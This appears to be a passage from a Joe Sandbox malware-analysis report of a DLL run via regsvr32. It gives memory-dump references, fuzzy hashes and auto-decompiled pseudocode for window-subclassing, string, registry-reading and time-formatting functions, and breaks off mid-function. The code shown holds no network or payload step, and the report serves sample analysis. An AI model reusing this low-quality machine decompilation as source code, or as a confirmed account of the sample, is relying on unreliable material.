Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 09507c0cd4b8124dccb18ffeca8d8117c0ce655038dc949e9a7a9cbd3f9c222c
Instruction ID: 9e002995ceec93e5a18f220086201f4699f56bd9eb4507195020d371ebd091ab
Opcode Fuzzy Hash: 09507c0cd4b8124dccb18ffeca8d8117c0ce655038dc949e9a7a9cbd3f9c222c
Instruction Fuzzy Hash: 90516A71900259EFDF51CF68ED81A8D7BF4FF49390FA181A9E8199B251D730DA80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002D120 Relevance: 6.1, APIs: 4, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E1002D120(struct HWND__* _a4, void* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				long _v8;
				void* _t17;
				signed int _t21;
				signed int _t27;
				intOrPtr _t33;
				void* _t37;
				struct HWND__* _t38;
				intOrPtr* _t40;

				_t37 = _a8;
				_t50 = _t37 - 0x82;
				if(_t37 != 0x82) {
					_t38 = _a4;
					_t17 = GetPropA(_t38, 0);
					_t40 = _a16;
					__eflags = _t17;
					_push(_t40);
					_t33 = _a20;
					_push(_a12);
					_push(_t37);
					_push(_t38);
					_push(_t33);
					_push(_t38);
					if(__eflags == 0) {
						_v8 = CallWindowProcA(E1002A360(__eflags), ??, ??, ??, ??);
						__eflags = _t33 - 3;
						if(_t33 != 3) {
							_t21 = _v8;
							goto L8;
						} else {
							_t21 = GetWindowLongA(_t38, 0xfffffff0);
							__eflags = (_t21 & 0x00000003) - 2;
							if((_t21 & 0x00000003) != 2) {
								L8:
								__eflags = _t37 - 0x18;
								if(__eflags > 0) {
									__eflags = _t37 - 0x46;
									if(_t37 == 0x46) {
										__eflags =  *0x10096d40 - 0x30a;
										if( *0x10096d40 >= 0x30a) {
											E1002C140(_t38, _t40);
										}
										goto L11;
									} else {
										__eflags = _t37 - 0x1943;
										if(_t37 < 0x1943) {
											goto L11;
										} else {
											__eflags = _t37 - 0x1944;
											if(_t37 <= 0x1944) {
												 *_t40 = 1;
												return 0x3ea;
											} else {
												goto L11;
											}
										}
									}
								} else {
									if(__eflags == 0) {
										__eflags =  *0x10096d40 - 0x30a;
										if( *0x10096d40 < 0x30a) {
											__eflags = _a8;
											if(_a8 == 0) {
												E1002C140(_t38, 0);
											}
										}
									} else {
										__eflags = _t37 - 0xf;
										if(_t37 == 0xf) {
											__eflags = _t33 - 3;
											if(_t33 != 3) {
												L19:
												E1002CDE0(_t38, 1, _t33);
											} else {
												_t27 = _t21 & 0x00000003;
												__eflags = _t27 - 2;
												if(_t27 == 2) {
													goto L19;
												} else {
													__eflags = _t27 - 3;
													if(_t27 == 3) {
														goto L19;
													}
												}
											}
										}
									}
									L11:
									return _v8;
								}
							} else {
								return _v8;
							}
						}
					} else {
						return CallWindowProcA(E1002A360(__eflags), ??, ??, ??, ??);
					}
				} else {
					return E1002A590(_t50, _a4, _t37, _a12, _a16, _a20);
				}
			}

0x1002d127
0x1002d12b
0x1002d131
0x1002d15a
0x1002d166
0x1002d16c
0x1002d170
0x1002d176
0x1002d177
0x1002d17b
0x1002d17c
0x1002d17d
0x1002d17e
0x1002d17f
0x1002d180
0x1002d1aa
0x1002d1ae
0x1002d1b1
0x1002d1d2
0x00000000
0x1002d1b3
0x1002d1b6
0x1002d1c1
0x1002d1c4
0x1002d1d6
0x1002d1d6
0x1002d1d9
0x1002d1ee
0x1002d1f1
0x1002d244
0x1002d24d
0x1002d251
0x1002d256
0x00000000
0x1002d1f3
0x1002d1f3
0x1002d1f9
0x00000000
0x1002d1fb
0x1002d1fb
0x1002d201
0x1002d260
0x1002d26e
0x1002d203
0x00000000
0x1002d203
0x1002d201
0x1002d1f9
0x1002d1db
0x1002d1db
0x1002d225
0x1002d22e
0x1002d230
0x1002d235
0x1002d23a
0x1002d23f
0x1002d235
0x1002d1dd
0x1002d1dd
0x1002d1e0
0x1002d205
0x1002d208
0x1002d217
0x1002d21b
0x1002d20a
0x1002d20a
0x1002d20d
0x1002d210
0x00000000
0x1002d212
0x1002d212
0x1002d215
0x00000000
0x00000000
0x1002d215
0x1002d210
0x1002d208
0x1002d1e0
0x1002d1e2
0x1002d1ed
0x1002d1ed
0x1002d1c6
0x1002d1d1
0x1002d1d1
0x1002d1c4
0x1002d182
0x1002d19a
0x1002d19a
0x1002d133
0x1002d157
0x1002d157

APIs

GetPropA.USER32(?,00000000), ref: 1002D166
CallWindowProcA.USER32(00000000), ref: 1002D191

Part of subcall function 1002A590: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 1002A5B6
Part of subcall function 1002A590: RemovePropA.USER32(?,00000000), ref: 1002A5CE
Part of subcall function 1002A590: RemovePropA.USER32(?,00000000), ref: 1002A5DA

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 1a43ed76124471126447068bcdead4f8ff764d08ab642eedd79a72cd4909f610
Instruction ID: bfab79e5f895c36b1f3b96bbe2acf5e833ef82e2cf18e0a4cfcb13d56effd5c4
Opcode Fuzzy Hash: 1a43ed76124471126447068bcdead4f8ff764d08ab642eedd79a72cd4909f610
Instruction Fuzzy Hash: E4313576F00205A7D214E618FC81E9F73D9FB86365FD44423FD0983201D329EE6982A3

Uniqueness

Uniqueness Score: -1.00%

Function 1001A5E5 Relevance: 6.1, APIs: 4, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001A5E5(void* __edi, void* _a4) {
				int _v8;
				int _v12;
				int _t17;
				intOrPtr* _t21;
				int _t24;
				intOrPtr _t25;
				intOrPtr* _t40;
				short* _t44;
				intOrPtr _t46;
				intOrPtr _t47;
				short _t48;
				void* _t50;
				short* _t51;

				_t50 = __edi;
				_push(_t34);
				_v12 = 0;
				if( *0x1009504c != 0) {
					InterlockedIncrement(0x100967c4);
					__eflags =  *0x100967b4; // 0x0
					if(__eflags == 0) {
						_v8 = 0;
					} else {
						InterlockedDecrement(0x100967c4);
						E1001F3A0(0x13);
						_v8 = 1;
					}
					_t17 =  *0x1009504c;
					__eflags = _t17;
					if(_t17 != 0) {
						_push(_t50);
						_t51 = E1001F0D2(_t17, 0x100, _a4, 0xffffffff, 0, 0, 0);
						__eflags = _t51;
						if(_t51 != 0) {
							_t24 = E1001A76A(_t51 + _t51);
							__eflags = _t24;
							_v12 = _t24;
							if(_t24 != 0) {
								_t25 = E1001F0D2( *0x1009504c, 0x100, _a4, 0xffffffff, _t24, _t51, 0);
								__eflags = _t25;
								if(_t25 != 0) {
									E1001C38D(_a4, _v12);
								}
							}
						}
						__eflags = _v8;
						if(_v8 == 0) {
							InterlockedDecrement(0x100967c4);
						} else {
							E1001F401(0x13);
						}
						E1001A722(_v12);
						_t21 = _a4;
						goto L28;
					} else {
						__eflags = _v8;
						if(_v8 == 0) {
							InterlockedDecrement(0x100967c4);
						} else {
							E1001F401(0x13);
						}
						_t21 = _a4;
						_t40 = _t21;
						__eflags =  *_t21;
						if( *_t21 == 0) {
							L28:
							return _t21;
						} else {
							do {
								_t46 =  *_t40;
								__eflags = _t46 - 0x41;
								if(_t46 >= 0x41) {
									__eflags = _t46 - 0x5a;
									if(_t46 <= 0x5a) {
										_t47 = _t46 + 0x20;
										__eflags = _t47;
										 *_t40 = _t47;
									}
								}
								_t40 = _t40 + 2;
								__eflags =  *_t40;
							} while ( *_t40 != 0);
							goto L28;
						}
					}
				}
				_t21 = _a4;
				_t44 = _t21;
				if( *_t21 == 0) {
					goto L28;
				} else {
					goto L2;
				}
				do {
					L2:
					_t48 =  *_t44;
					if(_t48 >= 0x41 && _t48 <= 0x5a) {
						 *_t44 = _t48 + 0x20;
					}
					_t44 = _t44 + 2;
				} while ( *_t44 != 0);
				goto L28;
			}

0x1001a5e5
0x1001a5e9
0x1001a5f4
0x1001a5f7
0x1001a62e
0x1001a634
0x1001a63a
0x1001a654
0x1001a63c
0x1001a63d
0x1001a645
0x1001a64b
0x1001a64b
0x1001a657
0x1001a65c
0x1001a65e
0x1001a6a2
0x1001a6b7
0x1001a6bc
0x1001a6be
0x1001a6c4
0x1001a6c9
0x1001a6cc
0x1001a6cf
0x1001a6e1
0x1001a6e9
0x1001a6eb
0x1001a6f3
0x1001a6f9
0x1001a6eb
0x1001a6cf
0x1001a6fa
0x1001a6ff
0x1001a70c
0x1001a701
0x1001a703
0x1001a708
0x1001a715
0x1001a71a
0x00000000
0x1001a660
0x1001a660
0x1001a663
0x1001a670
0x1001a665
0x1001a667
0x1001a66c
0x1001a676
0x1001a679
0x1001a67b
0x1001a67e
0x1001a71e
0x1001a721
0x1001a684
0x1001a684
0x1001a684
0x1001a687
0x1001a68b
0x1001a68d
0x1001a691
0x1001a693
0x1001a693
0x1001a696
0x1001a696
0x1001a691
0x1001a69a
0x1001a69b
0x1001a69b
0x00000000
0x1001a6a0
0x1001a67e
0x1001a65e
0x1001a5f9
0x1001a5fc
0x1001a601
0x00000000
0x00000000
0x00000000
0x00000000
0x1001a607
0x1001a607
0x1001a607
0x1001a60e
0x1001a619
0x1001a619
0x1001a61d
0x1001a61e
0x00000000

APIs

InterlockedIncrement.KERNEL32(100967C4), ref: 1001A62E
InterlockedDecrement.KERNEL32(100967C4), ref: 1001A63D
InterlockedDecrement.KERNEL32(100967C4), ref: 1001A670
InterlockedDecrement.KERNEL32(100967C4), ref: 1001A70C

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Interlocked$Decrement$Increment
String ID:
API String ID: 2574743344-0
Opcode ID: 980c792eac089b4664818dc00b2e5076ec88266ba1a7fd1f924fd265c4737894
Instruction ID: c09cdb594f3a74736825ad4b35489746a365c0619e318cafb30d568bdd7b030a
Opcode Fuzzy Hash: 980c792eac089b4664818dc00b2e5076ec88266ba1a7fd1f924fd265c4737894
Instruction Fuzzy Hash: 08312671505212ABEB11EFA0CC84A9E3BF9FB177A1F24401AF4444F1A5E676CEC0C790

Uniqueness

Uniqueness Score: -1.00%

Function 10063954 Relevance: 6.1, APIs: 4, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10063954(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				signed int _t43;
				void* _t46;
				char* _t50;
				signed int _t53;
				void* _t56;
				char* _t61;
				void* _t65;
				void* _t82;
				int* _t84;
				int _t89;
				void* _t91;

				_t82 = __edx;
				E1001A9E0(0x10076a98, _t91);
				_push(__ecx);
				_t65 =  *(_t91 + 0x14);
				_t89 =  *(_t91 + 0x10);
				_t84 = 0;
				 *_t89 = 0;
				 *_t65 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					E10063843(_t65, __ecx, _t89, __eflags, _t91 + 0xc,  *(_t91 + 8),  *(_t91 + 0xc), 0);
					 *(_t91 - 4) = 0;
					_t43 =  *( *(_t91 + 0xc) - 8);
					__eflags = _t43;
					 *(_t91 + 8) = _t43;
					if(_t43 != 0) {
						asm("cdq");
						 *_t65 = _t43 - __edx >> 1;
						_t46 = E10045FEF(_t43 - __edx >> 1);
						__eflags =  *(_t91 + 8);
						 *_t89 = _t46;
						if( *(_t91 + 8) > 0) {
							do {
								_t50 =  &(( *(_t91 + 0xc))[_t84]);
								asm("cdq");
								_t53 = _t84 - _t82;
								_t82 =  *_t89;
								_t84 = _t84 + 2;
								 *((char*)((_t53 >> 1) + _t82)) = (_t50[1] << 4) +  *_t50 - 0x51;
								__eflags = _t84 -  *(_t91 + 8);
							} while (_t84 <  *(_t91 + 8));
						}
						_t34 = _t91 - 4;
						 *_t34 =  *(_t91 - 4) | 0xffffffff;
						__eflags =  *_t34;
						E1004591E(_t91 + 0xc);
						goto L12;
					} else {
						 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
						E1004591E(_t91 + 0xc);
						goto L2;
					}
				} else {
					_t56 = E10063791(__ecx,  *(_t91 + 8));
					 *(_t91 + 0x14) = _t56;
					if(_t56 != 0) {
						 *(_t91 + 8) = RegQueryValueExA(_t56,  *(_t91 + 0xc), 0, _t91 - 0x10, 0, _t91 + 0x10);
						_t58 =  *(_t91 + 0x10);
						 *_t65 =  *(_t91 + 0x10);
						__eflags =  *(_t91 + 8);
						if( *(_t91 + 8) == 0) {
							_t61 = E10045FEF(_t58);
							 *_t89 = _t61;
							 *(_t91 + 8) = RegQueryValueExA( *(_t91 + 0x14),  *(_t91 + 0xc), 0, _t91 - 0x10, _t61, _t91 + 0x10);
						}
						RegCloseKey( *(_t91 + 0x14));
						__eflags =  *(_t91 + 8);
						if( *(_t91 + 8) == 0) {
							L12:
							_push(1);
							_pop(0);
						} else {
							E10046018( *_t89);
							 *_t89 = 0;
							goto L2;
						}
					} else {
						L2:
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return 0;
			}

0x10063954
0x10063959
0x1006395e
0x10063960
0x10063964
0x10063968
0x1006396a
0x1006396c
0x10063971
0x100639f5
0x100639fd
0x10063a00
0x10063a03
0x10063a05
0x10063a08
0x10063a1b
0x10063a21
0x10063a23
0x10063a28
0x10063a2d
0x10063a2f
0x10063a31
0x10063a34
0x10063a42
0x10063a43
0x10063a45
0x10063a4d
0x10063a4e
0x10063a51
0x10063a51
0x10063a31
0x10063a56
0x10063a56
0x10063a56
0x10063a5d
0x00000000
0x10063a0a
0x10063a0a
0x10063a11
0x00000000
0x10063a11
0x10063973
0x10063976
0x1006397d
0x10063980
0x1006399f
0x100639a2
0x100639a5
0x100639a9
0x100639ac
0x100639af
0x100639b5
0x100639c9
0x100639c9
0x100639cf
0x100639d5
0x100639d8
0x10063a62
0x10063a62
0x10063a64
0x100639de
0x100639e0
0x100639e6
0x00000000
0x100639e6
0x10063982
0x10063982
0x10063982
0x10063980
0x10063a6b
0x10063a73

APIs

__EH_prolog.LIBCMT ref: 10063959
RegQueryValueExA.ADVAPI32 ref: 1006399D
RegQueryValueExA.ADVAPI32 ref: 100639C7
RegCloseKey.ADVAPI32(?), ref: 100639CF

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: QueryValue$CloseH_prolog
String ID:
API String ID: 1759865455-0
Opcode ID: cad52e188a2c7b733dc08123d72d12d37fae24b808b2b2d52ddbf7bc4ae87c47
Instruction ID: bf4bc6bfd2458344e255b57f1447b14ae3bd61693e3f469936ef8323cc491d64
Opcode Fuzzy Hash: cad52e188a2c7b733dc08123d72d12d37fae24b808b2b2d52ddbf7bc4ae87c47
Instruction Fuzzy Hash: D8417BB640020AEFCB10CF68C88199EBBEAEF45350B24C52AF995D7261D770AA40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10038072 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10038072(void* __ebx, signed int* __ecx) {
				void* __ebp;
				signed char _t33;
				char _t39;
				int _t42;
				signed int _t47;
				int _t50;
				char _t61;
				signed int _t63;
				signed int _t65;
				signed int* _t74;
				CHAR* _t77;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int* _t88;

				 *_t88 =  *_t88 & 0x00000000;
				_t80 = _t88[0x24];
				_t74 = __ecx;
				_t33 =  *_t80;
				_t81 = _t80 + 1;
				_t77 =  &(_t88[4]);
				if(_t33 == 0) {
					L19:
					 *_t77 =  *_t77 & 0x00000000;
					E1004598C(_t88[0x25], _t81,  &(_t88[4]));
					return _t88[0x25];
				}
				do {
					if(_t33 != 0x25) {
						 *_t77 = _t33;
						_t77 =  &(_t77[1]);
						if(( *((_t33 & 0x000000ff) + 0x10096981) & 0x00000004) != 0) {
							 *_t77 =  *_t81;
							_t77 =  &(_t77[1]);
							_t81 = _t81 + 1;
						}
						goto L17;
					}
					_t61 =  *_t81;
					_t81 = _t81 + 1;
					_t39 = _t61;
					_t88[0x27] = _t81;
					if(_t39 == 0x25) {
						L14:
						 *_t77 = _t61;
						_t77 =  &(_t77[1]);
						goto L17;
					}
					if(_t39 == 0x44) {
						asm("cdq");
						_push( *_t74 / 0x15180);
						_t42 = wsprintfA(_t77, "%ld");
						_t88 =  &(_t88[3]);
						_t77 =  &(_t77[_t42]);
						goto L17;
					}
					if(_t39 == 0x48) {
						_t63 =  *_t74;
						asm("cdq");
						_t84 = _t63 / 0x15180 + _t63 / 0x15180 * 2 << 3;
						_t47 = _t63;
						asm("cdq");
						L11:
						_push(_t47 / 0xe10 - _t84);
						L12:
						_t50 = wsprintfA(_t77, "%02d");
						_t81 = _t88[0x2a];
						_t88 =  &(_t88[3]);
						_t77 =  &(_t77[_t50]);
						goto L17;
					}
					if(_t39 == 0x4d) {
						_t65 =  *_t74;
						asm("cdq");
						_t47 = _t65;
						_t84 = _t65 / 0xe10 * 0x3c;
						asm("cdq");
						0xe10 = 0x3c;
						goto L11;
					}
					if(_t39 != 0x53) {
						goto L14;
					}
					_t87 = 0x3c;
					asm("cdq");
					_push( *_t74 -  *_t74 / _t87 * 0x3c);
					goto L12;
					L17:
					_t33 =  *_t81;
					_t81 = _t81 + 1;
				} while (_t33 != 0);
				goto L19;
			}

0x10038078
0x1003807e
0x10038087
0x10038089
0x1003808c
0x1003808f
0x10038093
0x10038177
0x1003817e
0x10038186
0x1003819b
0x1003819b
0x100380a0
0x100380a2
0x10038154
0x10038156
0x10038161
0x10038166
0x10038168
0x10038169
0x10038169
0x00000000
0x10038161
0x100380a8
0x100380ab
0x100380ac
0x100380b2
0x100380b9
0x1003814f
0x1003814f
0x10038151
0x00000000
0x10038151
0x100380c2
0x1003813c
0x1003813f
0x10038146
0x10038148
0x1003814b
0x00000000
0x1003814b
0x100380c7
0x100380fe
0x10038107
0x10038110
0x10038112
0x10038114
0x1003811a
0x1003811e
0x1003811f
0x10038125
0x10038127
0x1003812e
0x10038131
0x00000000
0x10038131
0x100380cc
0x100380e5
0x100380f0
0x100380f5
0x100380f7
0x100380fa
0x100380fb
0x00000000
0x100380fb
0x100380d1
0x00000000
0x00000000
0x100380d9
0x100380da
0x100380e2
0x00000000
0x1003816a
0x1003816a
0x1003816d
0x1003816e
0x00000000

APIs

wsprintfA.USER32 ref: 10038125
wsprintfA.USER32 ref: 10038146

Strings

%02d, xrefs: 1003811F
%ld, xrefs: 10038140

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: wsprintf
String ID: %02d$%ld
API String ID: 2111968516-3415628970
Opcode ID: a6047e06618eb7978cfdf80d7a113cef3bfbaa75d3a14cad88eb507ce8358870
Instruction ID: cb6943d8035d4dc7e0967024a6e52e8b2669d97aa76ee5f7ee7f60948811e048
Opcode Fuzzy Hash: a6047e06618eb7978cfdf80d7a113cef3bfbaa75d3a14cad88eb507ce8358870
Instruction Fuzzy Hash: F7319E356083899FD32ACA158C407B9BBE8EB45281F20447DEEC5CF202E6749E1B8365

Uniqueness

Uniqueness Score: -1.00%

Function 10019B48 Relevance: 6.1, APIs: 4, Instructions: 109
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10019B48(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				char _v276;
				void* _v288;
				void* __ebp;
				intOrPtr _t40;
				intOrPtr* _t44;
				signed int _t48;
				signed int* _t58;
				intOrPtr* _t67;
				short* _t80;
				int _t83;
				short* _t84;

				E10064CD8(0xd);
				_v16 = 0x80029c4a;
				_t40 =  *((intOrPtr*)( *__ecx + 0x20))();
				_t67 = _a12;
				_t80 = 0;
				_v12 = _t40;
				_v8 = 0;
				if(E10019E00(_t40, _a4, _a8, _t67) == 0) {
					if(E10019D8C(_v12, _a4,  &_v8) == 0) {
						_push( &_v8);
						_push(_a4);
